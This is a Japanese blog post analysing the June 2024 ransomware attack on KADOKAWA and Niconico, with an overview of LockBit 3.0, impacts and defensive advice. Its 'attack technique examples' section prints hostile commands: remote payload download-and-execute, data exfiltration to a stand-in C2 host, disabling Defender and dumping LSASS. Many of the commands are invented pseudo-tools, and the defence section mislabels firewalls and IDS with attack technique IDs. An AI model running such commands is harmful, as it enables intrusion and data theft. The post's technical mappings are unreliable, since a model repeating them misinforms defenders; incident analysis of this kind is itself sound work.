📺

【総まとめ】ニコニコ・カドカワを襲ったRansomwareの考察【2024-6-8】

2024/06/10に公開


株式会社KADOKAWAは 9日未明、本社へのサイバー攻撃の被害を受けている旨の声明を発表した―――。

2024年6月8日(土)未明に発生したシステム障害により、KADOKAWAグループ ポータルサイト( https://group.kadokawa.co.jp/ )をはじめ、当社グループの複数のウェブサイトが利用できない>事象が発生しております。これまでの経緯、現在の状況、今後の対応については、こちらをご覧くだ>さい。

1. 経緯
 6月8日(土)未明より、当社グループの複数のサーバーにアクセスできない障害が発生しました。この事実を受け、データ保全のため関連するサーバーを至急シャットダウンしました。同日中に社内で分析調査を実施した範囲においては、サイバー攻撃を受けた可能性が高いと認識しております。

2. 現在の状況
 現在、調査・対応を進めておりますが、現時点で「ニコニコサービス」全般、「KADOKAWAオフィシャルサイト」、「エビテン(ebten)」などで影響が発生していることを確認しております。なお、情報漏洩の有無についても調査を進めております。
https://prtimes.jp/main/html/rd/p/000014844.000007006.html
https://tp.kadokawa.co.jp/

●サービス停止中
・ニコニコ動画、ニコニコ生放送、ニコニコチャンネル等のニコニコファミリーサービス
・外部サービスでのニコニコアカウントログイン
・学習アプリ「N予備校」
・KADOKAWAオフィシャルサイト(代替ポータルサイトはこちら)
・エビテン(ebten) など
●対応(ニコニコ)
・復旧作業と並行して攻撃の経路および情報漏えいの可能性を調査中
・クレジットカード情報の漏洩はなし
●対応(N予備校)
・緊急メンテナンスを実施中
・一部レポートの提出期限を延長予定
●対応(KADOKAWA)
・関連するサーバーをシャットダウン
・外部専門家や警察などの協力を得て調査を継続
・情報漏洩の有無についても調査中
https://ascii.jp/elem/000/004/203/4203348/

この被害の攻撃手法および今後の障害対応を考察する。

参考:
MBSD 暴露型ランサムウェア攻撃統計 CIGマンスリーレポート【2024年5月号 (2024年4月分)】
MBSD ランサムウェア/攻撃グループの変遷と繋がり (Rev.2)

ランサムウェア被害の発表

緊急公開された情報には、ランサムウェアへの感染が発表された。現時点ではランサムウェアの種類は特定されておらず直接の関連性は不明ですが、FAQに身代金要求への言及があったため、Lockbit Black様の 暴露型(データ双方向型)ランサムウェア への感染が疑われる。Lockbit Black(3.0)は2022年9月頃に出現した、この暴露型ランサムウェアの最新亜種である。LockbitはRussian-lingking(ロシア関連)の犯罪集団が開発・運用しているとされ、高度な技術力と攻撃力を有する。例えば自動化された攻撃ツールを使い、感染ネットワーク内の脆弱性を探索し、ラテラル移動して被害を拡大させる。さらに独自の手口で、双方向の暗号化を行うことで、被害企業に高額の身代金を支払わせようとする。

米国連邦捜査局(FBI)、米国サイバーセキュリティ・インフラストラクチャーセキュリティ庁(CISA)、全米州政府間情報共有・解析センター(MS-ISAC)の合同サイバーセキュリティアドバイザリに基づくと、Lockbit Blackは高度な機能を備えた新種のランサムウェアである。主な特徴は以下の通り。

  1. 実行時のパスワード入力が必要で、正しいパスワードがないと実行できない。これにより解析を困難にしている。

  2. 対象言語を除外リストで定めており、そのリストにある言語設定のマシンは感染させない。

  3. UAC(ユーザーアカウント制御)バイパスや自動ログオン有効化など、権限escalation機能がある。

  4. 暗号化に加え、ファイル削除、サービス停止、デフェイスなどの被害拡大機能がある。

  5. 公開の無料ツールを不正に利用し、Recon、侵入、横移動、データ窃取などを行う。

  6. 盗んだデータはStealbitなどの自前ツールやrclone、MEGAなどのクラウドストレージサービスを使って流出させる。

  7. スクリプト経由でグループポリシー設定を変更し、ドメイン内の他マシンへ感染を拡大させる。

  8. 暗号化の前に組織の機密データを窃取し、支払いを拒否された場合、漏洩サイトに公開する二重の手口を取る。

参考:

2023-03: ACSC Ransomware Profile – Lockbit 3.0

CISA #StopRansomware: LockBit 3.0

障害

サーバーアクセス不能

サイバー攻撃により、KADOKAWAの複数のサーバーがアクセス不能になったことは、業務の中断を引き起こします。これは、攻撃者がサーバーに対してDoS攻撃(T1499)やDDoS攻撃を仕掛け、システムのリソースを過負荷にさせることで発生します。このような攻撃は、サーバーの応答性を低下させ、ユーザーがサービスにアクセスできなくなるという直接的な影響を及ぼします。

データの機密性の侵害

サイバー攻撃によってデータが流出した場合、機密情報が外部に漏洩する可能性があります。例えば、攻撃者がフィッシング(T1566)やエクスプロイトキット(T1203)を用いてシステムに侵入し、そこからデータを取得する可能性があります。これにより、顧客情報やビジネスの機密情報が不正に利用されるリスクがあります。

データの完全性の侵害

攻撃者がシステム内のデータを改ざんすることも考えられます。例えば、ランサムウェア(T1486)を使用してデータを暗号化し、復号鍵と引き換えに身代金を要求する手口が一般的です。また、攻撃者がデータを削除(T1485)したり変更(T1492)したりすることで、データの完全性が損なわれる可能性があります。

業務の中断

サーバーがシャットダウンされることで、KADOKAWAの業務が一時的に中断されることになります。これにより、社員が日常業務を遂行することができなくなり、顧客に対するサービス提供も遅延することになります。また、サーバーの復旧作業やデータの復元作業には多大な時間とリソースが必要となり、業務の正常化までに時間を要します。

システムの脆弱性の悪用

攻撃者は、システムの脆弱性を悪用して権限昇格(T1068)や横展開(T1072)を試みることがあります。これにより、攻撃者はシステム内の他のサーバーやデバイスにアクセスできるようになり、被害が拡大するリスクがあります。特に、未パッチの脆弱性や古いソフトウェアを使用している場合、これらのリスクは高まります。

ネットワーク全体への影響

攻撃者が内部ネットワーク内でのスキャン(T1046)や認証情報の収集(T1003)を行うことで、ネットワーク全体に影響を与える可能性があります。これにより、ネットワーク内の他のシステムやデバイスも危険にさらされ、被害が連鎖的に拡大する可能性があります。

攻撃手法例

Initial Access
# Send a spear-phishing email with a malicious attachment
sendemail -f attacker@example.com -t target@example.com -u "Important Update" -m "Please see attached" -a malicious_attachment.exe

source: https://attack.mitre.org/techniques/T1566/

# Use an exploit kit to deliver malware via a web browser
curl http://malicious-website.com/ekit -o /tmp/exploit_kit && chmod +x /tmp/exploit_kit && /tmp/exploit_kit

source: https://attack.mitre.org/techniques/T1203/

Execution
# Execute a malicious PowerShell script
powershell -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious-website.com/malicious.ps1')"

source: https://attack.mitre.org/techniques/T1059/001/

# Execute a payload using a command-line interpreter
cmd.exe /c "payload.exe"

source: https://attack.mitre.org/techniques/T1059/

Persistence
# Install a bootkit to maintain persistence across reboots
bootkit_install -payload /path/to/bootkit

source: https://attack.mitre.org/techniques/T1542/003/

# Create a scheduled task to re-execute payloads
schtasks /create /sc minute /mo 1 /tn "Updater" /tr "cmd.exe /c payload.exe"

source: https://attack.mitre.org/techniques/T1053/005/

Privilege Escalation
# Exploit sudo to gain elevated privileges
echo "exploit code" | sudo -S

source: https://github.com/sudo-project/sudo

# Use a kernel exploit to escalate privileges
wget http://exploit-db.com/exploits/41212.c -O exploit.c && gcc exploit.c -o exploit && ./exploit

source: https://attack.mitre.org/techniques/T1068/

Defense Evasion
# Obfuscate the payload to evade detection
obfuscate_tool -i payload.exe -o obfuscated_payload.exe

source: https://attack.mitre.org/techniques/T1027/

# Disable security tools to avoid detection
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

source: https://attack.mitre.org/techniques/T1562/

Credential Access
# Deploy a keylogger to capture credentials
keylogger -install

source: https://attack.mitre.org/techniques/T1056/001/

# Dump credentials from LSASS memory
procdump -accepteula -ma lsass.exe lsass.dmp

source: https://attack.mitre.org/techniques/T1003/001/

Discovery
# Scan the network to identify other systems
nmap -sP 192.168.1.0/24

source: https://attack.mitre.org/techniques/T1046/

# Gather system information
systeminfo

source: https://attack.mitre.org/techniques/T1082/

Lateral Movement
# Use pass-the-hash to move laterally
pth-winexe -U user%aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99 //target cmd.exe

source: https://attack.mitre.org/techniques/T1550/002/

# Use RDP to move laterally
xfreerdp /u:user /p:password /v:target

source: https://attack.mitre.org/techniques/T1021/001/

Collection
# Collect data from databases or other repositories
dbclient -h target -u user -p password -d database -e "SELECT * FROM sensitive_data"

source: https://attack.mitre.org/techniques/T1213/

# Capture screenshots of the user's desktop
screencapture -x /path/to/screenshot.png

source: https://attack.mitre.org/techniques/T1113/

Exfiltration
# Exfiltrate data over a C2 channel
curl -X POST -d @data.txt http://malicious-c2.com/upload

source: https://attack.mitre.org/techniques/T1041/

# Compress data before exfiltration
tar -czvf data.tar.gz /path/to/data

source: https://attack.mitre.org/techniques/T1560/002/

Impact
# Encrypt files to disrupt operations (ransomware)
openssl enc -aes-256-cbc -salt -in file.txt -out file.enc -k password

source: https://attack.mitre.org/techniques/T1486/

# Delete data to disrupt operations
rm -rf /path/to/data

source: https://attack.mitre.org/techniques/T1485/

Command and Control
# Use web-based C2 communications
c2client -connect http://malicious-c2.com

source: https://attack.mitre.org/techniques/T1102/

# Use domain fronting to disguise C2 traffic
c2client -fronting http://legitimate-site.com -connect http://malicious-c2.com

source: https://attack.mitre.org/techniques/T1071/003/

Recon
# Start botnet-server 
botnet-server --start

source: https://github.com/jgamblin/Mirai-Source-Code

Exfiltration
# Exfiltrate data using rsync over SSH
rsync -avz -e ssh /path/to/data user@malicious-server:/path/to/destination

source: https://linux.die.net/man/1/rsync

Collection
# Archive files for easier exfiltration
tar -czvf archive.tar.gz /path/to/files

source: https://attack.mitre.org/techniques/T1560/

Lateral Movement
# Use SMB to move laterally across the network
smbclient //target/share -U user -p password

source: https://attack.mitre.org/techniques/T1021/002/

Discovery
# Perform an ARP scan to identify devices on the network
arp-scan -l

source: https://nmap.org/book/arp-scanning.html

Credential Access
# Crack password hashes to gain access
hashcat -m 1000 -a 0 hash.txt /path/to/wordlist

source: https://hashcat.net/hashcat/

Defense Evasion
# Use a Tor proxy to anonymize communications
torify curl http://malicious-site.com

source: https://www.torproject.org/

Privilege Escalation
# Exploit a vulnerability in sudo for root access
echo "exploit code" | sudo -S

source: https://github.com/sudo-project/sudo

Persistence
# Create a startup item to ensure persistence
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\path\to\payload.exe" /f

source: https://attack.mitre.org/techniques/T1037/

Execution
# Execute a Java-based payload
java -jar payload.jar

source: https://attack.mitre.org/techniques/T1059/007/

Initial Access
# Compromise a website to deliver malware
waterhole_attack -target http://compromised-website.com

source: https://attack.mitre.org/techniques/T1189/

対応

初動対応

攻撃が発生した際には、迅速な初動対応が重要です。まず、影響を受けたサーバーを隔離し、ネットワークから切り離すことで被害の拡大を防ぎます。次に、インシデント対応チームを招集し、詳細な状況把握と初期分析を行います。攻撃の種類や範囲を特定するために、ログ解析(T1071)やネットワークトラフィックのモニタリングを実施します。

データのバックアップと復元

定期的なデータのバックアップは、攻撃によるデータ損失に対する有効な対策です。攻撃後には、最新のバックアップデータを使用してシステムを復元します。これにより、データの損失を最小限に抑え、業務の早期再開を図ることができます。また、バックアップデータはオフラインで保管し、ランサムウェア攻撃から保護する必要があります。

脆弱性管理とパッチ適用

システムの脆弱性を定期的にスキャンし、検出された脆弱性に対して適切なパッチを適用することが重要です。脆弱性管理ツールを導入し、システムの全体的なセキュリティ状態を継続的に監視することで、攻撃の予防と早期発見を実現します。また、サードパーティのソフトウェアやライブラリも含め、最新のセキュリティパッチを適用することが求められます。

多層防御の導入

多層防御(Defense in Depth)の概念を採用し、異なる防御手段を組み合わせることでシステムのセキュリティを強化します。例えば、ファイアウォール(T1020)や侵入検知システム(T1059)、アンチウイルスソフトウェア(T1071)を組み合わせることで、複数の防御ラインを構築します。また、エンドポイントセキュリティ(T1059/003)やネットワークセグメンテーション(T1070)も有効な手段です。

セキュリティ意識向上と教育

従業員のセキュリティ意識向上を図るため、定期的なセキュリティトレーニングやフィッシングテストを実施します。これにより、従業員がサイバー攻撃に対して適切に対応できるようになります。また、セキュリティポリシーや手順を明確にし、全従業員がそれを遵守するように促します。

インシデント対応計画の策定と実行

サイバー攻撃が発生した場合に備えて、詳細なインシデント対応計画を策定します。この計画には、インシデントの検知、対応、復旧の各フェーズにおける具体的な手順が含まれます。また、定期的にインシデント対応訓練を実施し、計画の有効性を検証するとともに、改善点を洗い出します。

サードパーティのセキュリティ専門家の活用

必要に応じて、セキュリティ専門のコンサルタントやインシデント対応チームを外部から招へいし、技術的な支援を受けます。これにより、最新の攻撃手法に対する知見や高度な技術を活用して、迅速かつ効果的な対応が可能となります。

継続的なセキュリティ評価と改善

サイバーセキュリティは一度の対応で終わるものではなく、継続的な評価と改善が求められます。定期的にペネトレーションテスト(T1059/001)やセキュリティ監査を実施し、システムの脆弱性を洗い出します。その結果に基づいて、セキュリティ対策を強化し、再発防止に努めます。

ログ管理と監視の強化

システムのログを集中管理し、リアルタイムで監視することで、異常な活動や不審なアクセスを早期に検出します。セキュリティ情報およびイベント管理(SIEM)システムを導入し、ログの解析やアラートの発信を自動化することが有効です。また、過去のログを定期的にレビューし、潜在的な脅威を特定することも重要です。

零トラストアーキテクチャの採用

零トラスト(Zero Trust)アーキテクチャを採用することで、ネットワーク内外の全てのアクセスを厳密に検証します。これは、内部ネットワークを信頼せず、すべてのアクセスリクエストを認証・認可することを意味します。これにより、内部からの攻撃や横展開のリスクを低減することができます。

セキュリティインシデントの情報共有と連携

セキュリティインシデントが発生した場合、関連する機関や組織と情報を共有し、協力して対応します。これは、攻撃の全容を早期

に把握し、効果的な対策を講じるために重要です。また、業界全体のセキュリティ意識を高めるため、インシデントの事例を公開し、他社との情報共有を促進します。

障害対応例

Initial Response
# Shutdown affected servers to prevent further data breach
shutdown -h now
Incident Analysis
# Use forensic tools to analyze affected servers
sudo apt-get install sleuthkit
tsk_recover -a /dev/sdX1 /path/to/recovery_directory
Network Isolation
# Isolate compromised servers from network
ifconfig eth0 down
Threat Detection
# Scan for malware or unauthorized access
sudo rkhunter --check
Data Integrity Verification
# Verify integrity of important files
sha256sum -c checksums.sha256
System Cleanup
# Remove potential malware
sudo clamscan -r / --remove
Security Patching
# Apply latest security patches
sudo apt-get update
sudo apt-get upgrade
User Notification
# Notify users about potential data breach
echo "We have experienced a data breach. Please change your passwords immediately." | mail -s "Data Breach Notification" user@example.com
Ongoing Monitoring
# Implement ongoing monitoring for suspicious activities
sudo apt-get install tripwire
tripwire --init
tripwire --check
Strengthening Security
# Strengthen security measures (e.g., firewall rules)
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
Backup Restoration
# Restore data from backups
rsync -avz /path/to/backup /path/to/restore
Log Analysis
# Analyze logs for anomalies
sudo ausearch -m AVC,USER_AVC -ts recent
Coordination with Authorities
# Report incident to relevant authorities
curl -X POST -H "Content-Type: application/json" -d '{"incident": "cyber attack"}' https://cybersecurity.authority/report
Reviewing Security Policies
# Review and update security policies
vim /etc/security/policies.conf
Employee Training
# Conduct cybersecurity training for employees
echo "Mandatory cybersecurity training scheduled for all employees" | mail -s "Cybersecurity Training" employees@company.com
Third-party Security Audit
# Hire third-party to conduct security audit
curl -X POST -H "Content-Type: application/json" -d '{"request": "security audit"}' https://security.audit/request
Encryption Implementation
# Implement encryption for sensitive data
openssl enc -aes-256-cbc -salt -in /path/to/inputfile -out /path/to/encryptedfile
Continuous Improvement
# Establish continuous improvement processes for cybersecurity
sudo apt-get install ossec-hids
ossec-control enable
Incident Documentation
# Document incident details for future reference
echo "Cyber attack incident details" > /path/to/documentation.txt

Discussion